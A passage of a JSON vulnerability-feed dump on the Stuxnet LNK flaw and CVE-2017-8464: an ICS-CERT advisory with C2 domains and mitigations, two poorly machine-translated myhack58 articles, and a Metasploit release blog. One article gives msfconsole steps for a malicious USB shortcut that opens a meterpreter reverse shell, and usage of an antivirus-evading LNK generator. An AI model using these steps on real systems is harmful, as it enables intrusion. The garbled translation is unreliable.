malware may disable the software.\n\nSymantec has also performed some in-depth analysis of the Stuxnet malware files.e This information has not been independently verified by ICS-CERT but is included for reference.\n\n### Callback Domains/Command &amp; Control\n\nIndependent analysis from multiple sourcesf ,g ,h ,i has identified the following domains as command and control domains associated with the malware. ICS-CERT has not independently verified these findings, but calls to these domains may indicate a compromise.\n\n * mypremierfutbol.com\n * todaysfutbol.com\n\nAdditionally, some sources are reporting that HTTP requests with the following content may be indicative of a compromised host:\n\n * \u201cindex.php?data=66a96e28\u201d\n\n### Installed Filesj\n\nC:\\WINDOWS\\system32\\drivers\\mrxnet.sys \nC:\\WINDOWS\\system32\\drivers\\mrxcls.sys \nC:\\WINDOWS\\inf\\oem7A.PNF \nC:\\WINDOWS\\inf\\oem6C.PNF \nC:\\WINDOWS\\inf\\mdmeric3.PNF \nC:\\WINDOWS\\inf\\mdmcpq3.PNF\n\n## Mitigation\n\nMicrosoft\u2019s Security Advisory (2286198)k provides workarounds to mitigate this previously unknown vulnerability being exploited by this malware:\n\n * Disable the displaying of icons for shortcuts\n * Disable the WebClient service\n\nMicrosoft has released an updated advisory that includes:\n\n * Information on an additional attack vector identified through the use of PIF files, which are very similar to LNK shortcuts.\n * Updated workarounds to reflect that the IconHandler also needs to be edited.\n * A new Fix It tool, which allows administrators and users to more easily deploy the workaround.\n * A workaround to block downloading of LNK and PIF files from the internet. These files cannot be renamed, but any blocking solution should take into account the WebDAV protocol, if the WebDAV client has not already been disabled;\n * Clarification of some of the possible attack vectors, including the use of an embedded shortcut in an Office document, or the use of a web browser to browse malicious content.\n\nOther suggested workarounds to help reduce the risks to this and other vulnerabilities include:\n\n * Disable AutoRun as described in Microsoft Support article [967715](<http://support.microsoft.com/kb/967715>).\n * Implement the principle of least privilege as defined in the [Microsoft TechNet Library](<http://technet.microsoft.com/en-us/library/bb456992.aspx>).\n * Maintain up-to-date antivirus software.\n\nSiemens has also released an [advisory ](<http://support.automation.siemens.com/WW/llisapi.dll?func=cslib.csinfo&lang=en&objid=43876783&caller=view>)to address questions surrounding this [issue](<http://support.automation.siemens.com/WW/llisapi.dll?func=cslib.csinfo&lang=en&objid=43876783&caller=view.>). Siemens has indicated that they have received one notification of an infection to an organization in Germany. The damage, if any, is unknown at this time.\n\n### **\\--------- Begin Update C \u2013 Part 1 of 2 ----------**\n\nSiemens indicates four customers have been infected worldwide with no impact to [production](<http://support.automation.siemens.com/WW/view/en/43876783>).\n\n### **\\---------- End Update C \u2013 Part 1 of 2 ----------**\n\nAntivirus vendorsl ,m have indicated the presence of a second Stuxnet variant. Most reports indicate the new rootkit driver is very similar to previously observed samples. The main difference noted has been the use of a certificate from JMicron Technology Corporation to digitally sign the driver.\n\n### Siemens Security Update\n\nSiemens has released a Security Update: SIMATIC_Security_Update_20100722.exe, which is available on their [support website](<http://support.automation.siemens.com/WW/view/en/43876783>).\n\nAccording to Siemens, the SIMATIC update accomplishes the following:\n\n * Modifies the registry settings according to Microsoft\u2019s Security Advisoryk version 1.2.\n * Adapts the SQL Server settings to the latest security settings. This step will make for stricter authentication controls.\n\nInstalling this SIMATIC update will replace all Siemens system icons with standard Windows icons. Siemens recommends meaningful names be assigned to desktop and Windows Start menu links so they may be easily recognized after the update.\n\nAdditionally, Siemens product support has provided a link to download a copy of Trend Micro System Cleaner (Sysclean) to assist users in detecting/cleaning infected systems.\n\nOwners and operators should exercise caution however, and consult their control systems vendor prior to making any changes. Proper impact analysis and testing should always be conducted prior to making any changes to control systems. Siemens CERT has indicated that they are performing testing on the mitigations to determine their possible effects on control systems.\n\nICS-CERT reminds users to exercise caution when using USB drives. For more information on best practices and removable media, see the ICS-CERT Control Systems Analysis Report \u201cUSB Drives Commonly Used As An Attack Vector Against Critical Infrastructure.\"\n\nMalware samples have been provided to the antivirus vendor community. ICS-CERT recommends consulting your antivirus and control systems vendor before scanning systems with current antivirus software. The malware is identified by some anti-virus vendors as the following:\n\n * Mcafee: Stuxnet\n * Kaspersky: Trojan-Dropper.Win32.Stuxnet.a\n * TrendMicro: WORM_STUXNET.A\n * Sophos: Troj/Stuxnet-A\n * Microsoft: TrojanDropper:Win32/Stuxnet.A\n * Panda: Trj/CI.A\n * DrWeb: Trojan.Stuxnet.1\n * Ikarus: Trojan-Dropper.Win32.Stuxnet\n * Norman: W32/Stuxnet.C\n * F-Secure: Exploit:W32/WormLink.A\n\nAs details of the malware become better known, further mitigation recommendations will be published. Please report any issues affecting control systems in critical infrastructure environments to ICS-CERT.\n\nOrganizations should follow their established internal procedures if any suspected malicious activity is observed, and report their findings to ICS\u2010CERT for tracking and correlation against other incidents. ICS\u2010CERT reminds organizations that proper impact analysis and risk assessment should be performed prior to taking defensive measures.\n\n### **\\--------- Begin Update C \u2013 Part 2 of 2 ----------**\n\nMicrosoft has released an [out-of-band security bulletin](<http://www.microsoft.com/technet/security/bulletin/ms10-aug.mspx>) on Monday, August 2, 2010 to address the vulnerability used by the Stuxnet malware to infect systems.\n\nThe Microsoft bulletin addresses a security vulnerability that exists in all supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. ICS-CERT recommends that all control systems operations personnel work with their vendor to assess potential impacts before implementing this new fix. ICS-CERT also recommends coordinating with your vendor to determine if the operating system provided in your control systems installation is affected by this vulnerability and if a fix is available.\n\n### **\\---------- End Update C \u2013 Part 2 of 2 ----------**\n\n * aVirusBlokAda, http://www.anti-virus.by/en/tempo.shtml, website last visited July 15, 2010.\n * bVulnerability Note, http://www.kb.cert.org/vuls/id/940193, website last visited July 16, 2010.\n * cMicrosoft Security Advisory, http://www.microsoft.com/technet/security/advisory/2286198.mspx, website last visited July 19, 2010.\n * dVirusBlokAda, http://www.wilderssecurity.com/attachment.php?attachmentid=219888&amp;d=1279012965, website last visited July 15, 2010.\n * eSymantec, http://www.symantec.com/connect/blogs/distilling-w32stuxnet-components, last accessed July 22, 2010.\n * fZscaler Research, http://research.zscaler.com/2010/07/lnk-cve-2010-2568-stuxnet-incident.html, last accessed July 22, 2010.\n * gSiemens Forum, http://www.automation.siemens.com/WW/forum/guests/PostShow.aspx?PageIndex=1&amp;PostID=225893&amp;Language=en last accessed July 22, 2010.\n * hCERT-In, http://www.cert-in.org.in/virus/Stuxnet_Rootkit.htm, last accessed July 22, 2010.\n * iTrendMicro, http://threatinfo.trendmicro.com/vinfo/web_attacks/Worm%20Propagates%20via%20Windows%20Shortcut%20Vulnerability%20Exploit.html, last accessed July22, 2010\n * jVirusBlokAda, http://www.wilderssecurity.com/attachment.php?attachmentid=219888&amp;d=1279012965, website last visited July 15, 2010.\n * kMicrosoft Security Advisory, http://www.microsoft.com/technet/security/advisory/2286198.mspx, website last visited July 19, 2010.\n * lF-Secure, http://www.f-secure.com/weblog/archives/00001993.html, website last visited July 21, 2010.\n * mJeremy Kirk, http://www.infoworld.com/d/security-central/second-variant-stuxnet-worm-strikes-944?source=rss_infoworld_news, website last visited July 21, 2010.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-10-201-01C>); we'd welcome your feedback.\n", "modified": "2014-01-08T00:00:00", "published": "2010-08-02T00:00:00", "id": "ICSA-10-201-01C", "href": "https://www.us-cert.gov/ics/advisories/ICSA-10-201-01C", "type": "ics", "title": "USB Malware Targeting Siemens Control Software (Update C)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-08-09T15:19:46", "bulletinFamily": "info", "cvelist": ["CVE-2017-8464", "CVE-2107-8464", "CVE-2010-2568"], "edition": 1, "description": "Microsoft in the 2017 year 6 month patch patch a shortcut CVE-2107-8464 of vulnerability, the announcement says this vulnerability is the National background of network attacks the use to implement the attack, the vulnerability is also known as the seismic network of the third generation, recently Metasploit published on the vulnerability of the PoC. [ This article is HanSight Han si original manuscript, for reprint please indicate the source\uff01] \nMicrosoft in the 2017 year 6 month patch patch a shortcut CVE-2107-8464 of vulnerability, the announcement says this vulnerability is the National background of network attacks the use to implement the attack, the vulnerability is also known as\u201cearthquake network generation\u201d, recently Metasploit published on the vulnerability of the PoC. \nThe vulnerability principle is the same as 2010, the United States and Israel to invade and destroy Iran's nuclear facilities seismic network operations the use of penetrating nuclear isolation network Vulnerability, CVE-2010-2568 is very similar,\"it can easily be exploited by hackers to attack the infrastructure, storage of key information on core isolation system.\" \n\"When there is a vulnerability in the computer is plug in to save a vulnerable file of U disc, no need extra operation, exploits the program can perform and complete control of the user computer system\" is. \nVulnerability PoC demo: \n! [](/Article/UploadPic/2017-8/201789195027567. gif? www. myhack58. com) \nThe PoC for the LNK File format as shown below: \n! [](/Article/UploadPic/2017-8/201789195027829. png? www. myhack58. com) \nLNK File format the following figure \nTypically contains a Link to the file header, LinkTargetIDList, the error pop-UPS, And StringData and the extradata property of. \n! [](/Article/UploadPic/2017-8/201789195027941. jpg? www. myhack58. com) \nThe PoC relates to the important field, after the text will be explained. \nWant to trigger this vulnerability, LNK files must have the LinkTargetIDList and the extradata property of the two Block. PoC File format figure in the second row of numbers 81, The representative is the LNK file header of the LinkFlags field, 81 is the meaning of the LNK file contains a LinkTargetIDList, and string using Unicode encoding. In LinkTargetIDList followed by is the extradata property, the present vulnerability is SpecialFolderDataBlock it. \nLinkTargetIDList format the following figure \nThe PoC contains 3 item, wherein the item 2 containing the trigger the vulnerability after the automatic execution of the malicious DLL file path: \n! [](/Article/UploadPic/2017-8/201789195027452. jpg? www. myhack58. com) \nPoC IDListSize is 0x8E, which has 3 item, the first item The size is 0\u00d714, and the second item The size is 0\u00d714, and the third item The size is 0\u00d764 in. \nLinkTargetIDList included in the Item format is as follows: \n! [](/Article/UploadPic/2017-8/201789195027566. jpg? www. myhack58. com) \nThe extradata property format the following figure \nThe vulnerability used is SpecialFolderDataBlock: the \n! [](/Article/UploadPic/2017-8/201789195027884. jpg? www. myhack58. com) \nTo understand the Complete file formats, vulnerability principle not very complicated: finished parsing LinkTargetIDList after parsing SpecialFolderDataBlock, parsing SpecialFolderDataBlock process CShellLink::_DecodeSpecialFolder will according to which the offset 0\u00d728 to find the front of the item 2, and will be one of the DLLload into memory to perform one of the DllMain. Due to this parsing process is in the explorer. exe in the implementation, so the corresponding load into memory a malicious DLL also has the same high permissions is generally High in. \nThe figure below is the PoC exploit is triggered when the call stack, as well as vulnerability after the implementation will load the malicious DLL into memory: \n! [](/Article/UploadPic/2017-8/201789195027956. jpg? www. myhack58. com) \n! [](/Article/UploadPic/2017-8/201789195027572. jpg? www. myhack58. com) \nPatch comparison: \n! [](/Article/UploadPic/2017-8/201789195027161. jpg? www. myhack58. com) \nMicrosoft in patch, by calling _IsRegisteredCPLApplet function of the DLL path validation failed will no longer call CPL_LoadCPLModule function. \nHanSight solutions \nHanSight Enterprise through the host log correlation analysis, summarizes the Stuxnet vulnerability in common, including the U disk plug acts and the host process behavior, etc., can detect such problems, and an alarm is generated: the \n! [](/Article/UploadPic/2017-8/201789195027690. png? www. myhack58. com) \nPrevention policy recommendations \n1\\. Use HanSight Enterprise monitoring host behavior in a timely manner to warn the Troubleshooting process. \n2\\. Update Windows operating system patches \nhttps://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464 \nReferences \n1\\. Metasploit \n2\\. Shell Link (. LNK) File format: \nhttps://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]. pdf \n\n", "modified": "2017-08-09T00:00:00", "published": "2017-08-09T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/88476.htm", "id": "MYHACK58:62201788476", "title": "\u201cThe seismic network of the third generation\u201dCVE-2017-8464 vulnerability analysis and early warning-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-06T22:18:09", "bulletinFamily": "info", "cvelist": ["CVE-2017-8464", "CVE-2010-2568", "CVE-2015-0096"], "edition": 1, "description": "As early as 6 May 13, Microsoft released patches to fix numbered CVE-2017-8464 vulnerability, a local user or a remote attacker can exploit this vulnerability to generate a specially crafted shortcut, and through a removable device or a remote shared way lead to remote code execution, Dating back to the past, the NSA recognized the use of similar vulnerabilities and to\u201cOlympic Game\u201dfor the code developed Stuxnet virus, to prevent Iran from developing nuclear weapons. \nCVE-2017-8464 vulnerability affects versions: \nWindows 7 \nWindows 8.1 \nWindows RT 8.1 \nWindows 10 \nWindows Server 2008 \nWindows Server 2008 R2 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows Server 2016 \nUse \n1 in Metasploit-Framework in the use of CVE-2017-8464 \n1. First download the latest zip package\u3010download\u3011, download after the completion of the compressed package inside the modules/exploits/windows/fileformat in cve_2017_8464_lnk_rce. rb is copied to the directory/usr/share/metasploit-framework/modules/exploits/windows/fileformat. \n2. Just copy the rb file will be an error, must then be compressed within the package data/exploits in the cve-2017-8464 folder copy to/usr/share/metasploit-framework/data/exploits. \n3. Open a terminal \nmsfconsole \nuse exploit/windows/fileformat/cve_2017_8464_lnk_rce \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST [your IP address] \nTrojan \n! [](/Article/UploadPic/2017-8/20178711814896. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-8/20178711814375. png? www. myhack58. com) \nAfter/root/. msf4/local, it will generate our desired files, generate so much and the letter is concerned, are left with no space. \n4. Continue to enter the command \nuse multi/handler \nset paylaod windows/meterpreter/reverse_tcp \nset LHOST [your IP address] \nrun \n5. The removable disk inserted into the drone, if the drone on auto play, select the Browse for a file when you can rebound. \n! [](/Article/UploadPic/2017-8/20178711814631. png? www. myhack58. com) \nDemo: \n! [](/Article/UploadPic/2017-8/20178711814509. gif? www. myhack58. com) \n*2\uff09PowerShell \nThis using the Powershell method is not the previous network spread of the CVE-2017-8464 reproduction method. \nFirst of all download the Export-LNKPwn. ps1\u3010Click here\u3011 \nNote: \n-Need 4. 0 or above. NET Library version, the authors use a number only PowerShell 5.0 is only some of the constructors like new (), the \u4ed6\u6253\u7b97\u5c06\u7248\u672c\u8981\u6c42\u964d\u4f4e\u5230.NET 3.5 and PowerShell 2.0, so it module in all the target environments can be loaded into memory. \n-The authors want to expand the function, so the user can generate the original Stuxnet LNK exp\uff08CVE-2010-2568, and solve the bypass issue CVE-2015-0096 in it. \n-Antivirus will handle your LNK, and more than ready to escape detection! \nParameter Description: \nLNKOutPath: local save the LNK file's full path. \nTargetCPLPath: local/remote target cpl of the full path. \nType: used FolderDataBlock type,\u201cSpecialFolderDataBlock\u201dand\u201cKnownFolderDataBlock\u201dtwo. \nExample of use: \nC:\\PS&gt; The Export-LNKPwn-LNKOutPath C:\\Some\\Local\\Path.lnk -TargetCPLPath C:\\Target\\CPL\\Path.cpl -Type SpecialFolderDataBlock \nC:\\PS&gt; The Export-LNKPwn-LNKOutPath C:\\Some\\Local\\Path.lnk -TargetCPLPath C:\\Target\\CPL\\Path.cpl -Type KnownFolderDataBlock \n\n", "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/88412.htm", "id": "MYHACK58:62201788412", "title": "\u201cThe seismic network of the third generation\u201d\uff08CVE-2017-8464 several species using the method and prevention-vulnerability and early warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7blog": [{"lastseen": "2021-01-30T00:48:42", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2018-9276", "CVE-2020-11853", "CVE-2020-11854", "CVE-2020-15505", "CVE-2020-28949"], "description": "## MobileIron MDM Hessian-Based Java Deserialization RCE\n\n\n\nOur very own [wvu-r7](<https://github.com/wvu-r7>) has added `exploits/linux/http/mobileiron_mdm_hessian_rce`, which exploits an ACL bypass in MobileIron MDM products to execute a Java deserialization attack using a Groovy gadget against a Hessian based endpoint. ([CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505?referrer=blog>)). MDM helps organizations manage and control all employees' devices, requiring it to be publicly reachable to synchronize devices, making this an appealing target. This exploit has been included on the U.S. National Security Agency's list of vulnerabilities known to be exploited by Chinese state-sponsored threat actors. More information about this exploit can be found [here](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505?referrer=blog#rapid7-analysis>).\n\n## PEAR Archive_Tar &lt; 1.4.11 Arbitrary File Write\n\n`exploits/multi/fileformat/archive_tar_arb_file_write` has been added by [gwillcox-r7](<https://github.com/gwillcox-r7>), which adds support for [CVE-2020-28949](<https://attackerkb.com/topics/gLmKfmD9Dl/cve-2020-28949?referrer=blog>). CVE-2020-28949 is a vulnerability which affects the Archive_Tar plugin of the PEAR PHP development framework and is caused by Archive_Tar\u2019s lack of validation of file stream wrappers contained within filenames, which for allows the writing of an arbitrary file containing user controlled content to an arbitrary location on disk.\n\n## Micro Focus UCMDB Java Deserialization Unauthenticated Remote Code Execution\n\nCommunity contributor [Pedro Ribeiro](<https://github.com/pedrib>) has added `exploits/multi/http/microfocus_ucmdb_unauth_deser`, which exploits two vulnerabilities [CVE-2020-11853](<https://attackerkb.com/topics/KTzvjJFDS8/cve-2020-11853?referrer=blog>) and [CVE-2020-11854](<https://attackerkb.com/topics/sQf6eBCrAZ/cve-2020-11854?referrer=blog>), that when chained allow an attacker to achieve unauthenticated remote code execution in Micro Focus UCMDB. CVE-2020-11854 is the use of a hardcoded password for the &quot;diagnostics&quot; user, which allows attackers to log into UCMDB. CVE-2020-11853 takes advantage of the fact that after authentication, almost all of the UCMDB client\u2019s communication is done using Java serialized objects, allowing an authenticated attacker to inject a malicious Java serialized object into a POST body to one of the vulnerable endpoints to achieve remote code execution as root or SYSTEM.\n\n## New modules (5)\n\n * [MobileIron MDM Hessian-Based Java Deserialization RCE](<https://github.com/rapid7/metasploit-framework/pull/14645>) by wvu, Orange Tsai, iamnoooob, and rootxharsh, which exploits [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505?referrer=blog>)\n * [PEAR Archive_Tar &lt; 1.4.11 Arbitrary File Write](<https://github.com/rapid7/metasploit-framework/pull/14618>) by gwillcox-r7 and xorathustra, which exploits [CVE-2020-28949](<https://attackerkb.com/topics/gLmKfmD9Dl/cve-2020-28949?referrer=blog>)\n * [Micro Focus UCMDB Java Deserialization Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14654>) by Pedro Ribeiro, which exploits [CVE-2020-11853](<https://attackerkb.com/topics/KTzvjJFDS8/cve-2020-11853?referrer=blog>)\n * [PRTG Network Monitor Authenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/14627>) by Josh Berry and Julien Bedel, which exploits [CVE-2018-9276](<https://attackerkb.com/topics/exAxAsJV7d/cve-2018-9276?referrer=blog>)\n * [FannyBMP or DementiaWheel Detection Registry Check](<https://github.com/rapid7/metasploit-framework/pull/14541>) by William M., which does a Registry check for the presense of [CVE-2010-2568](<https://attackerkb.com/topics/nffaTD2h9a/cve-2010-2568?referrer=blog>)\n\n## Enhancements and features\n\n * [PR #14383](<https://github.com/rapid7/metasploit-framework/pull/14383>) by [h00die](<https://github.com/h00die>) added two new external module examples in python, one as an exploit module example and the other as an auxiliary example.\n * [PR #14651](<https://github.com/rapid7/metasploit-framework/pull/14651>) by [bcoles](<https://github.com/bcoles>) updates msftidy to verify that all modules have a module description.\n * [PR #14564](<https://github.com/rapid7/metasploit-framework/pull/14564>) by [adfoster-r7](<https://github.com/adfoster-r7>) updates internal Metasploit libraries to dependency inject the currently active module when performing tab completion for users.\n * [PR #14432](<https://github.com/rapid7/metasploit-framework/pull/14432>) by [cn-kali-team](<https://github.com/cn-kali-team>) adds a new function `report_creds` to the `kiwi.rb` and `priv/password.rb` Meterpreter libraries. This function ensures that credentials dumped via Kiwi or via the `hashdump` command are now appropriately captured in the `creds` database, allowing users to replay them later on, or attempt to crack them and obtain the plain text password.\n\n## Bugs fixed\n\n * [PR #14664](<https://github.com/rapid7/metasploit-framework/pull/14664>) by [s1e2b3i4](<https://github.com/s1e2b3i4>) applies a fix to `auxiliary/scanner/ssh/ssh_enumusers.rb` to ensure that error messages that occur when a user doesn't exist on the target system, or whom can't connect remotely, are not displayed unless the VERBOSE flag is set.\n * [PR #14657](<https://github.com/rapid7/metasploit-framework/pull/14657>) by [jmartin-r7](<https://github.com/jmartin-r7>) updates Metasploit's docker build process to download pip from an alternative Github download source now that python2 will no longer be available after January 30th 2021.\n * [PR #14650](<https://github.com/rapid7/metasploit-framework/pull/14650>) by [bcoles](<https://github.com/bcoles>) updates `local_exploit_suggester` to correctly store rhost information in the database, as previously this would crash.\n * [PR #14647](<https://github.com/rapid7/metasploit-framework/pull/14647>) by [zeroSteiner](<https://github.com/zeroSteiner>) addresses a typo introduced in [#14582](<https://github.com/rapid7/metasploit-framework/pull/14582>) whereby non-existent value is used to populate the tab completion array for the run command of modules that support actions as commands, resulting in msfconsole crashing when tab completion was attempted. Users should now be able to do tab completion using the run command without errors.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.27...6.0.28](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-01-21T12%3A45%3A57-06%3A00..2021-01-28T13%3A25%3A20-06%3A00%22>)\n * [Full diff 6.0.27...6.0.28](<https://github.com/rapid7/metasploit-framework/compare/6.0.27...6.0.28>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-01-29T21:09:49", "published": "2021-01-29T21:09:49", "id": "RAPID7BLOG:B65D62B8E1AD22C908D33D641FD0A55E", "href": "https://blog.rapid7.com/2021/01/29/metasploit-wrap-up-96/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}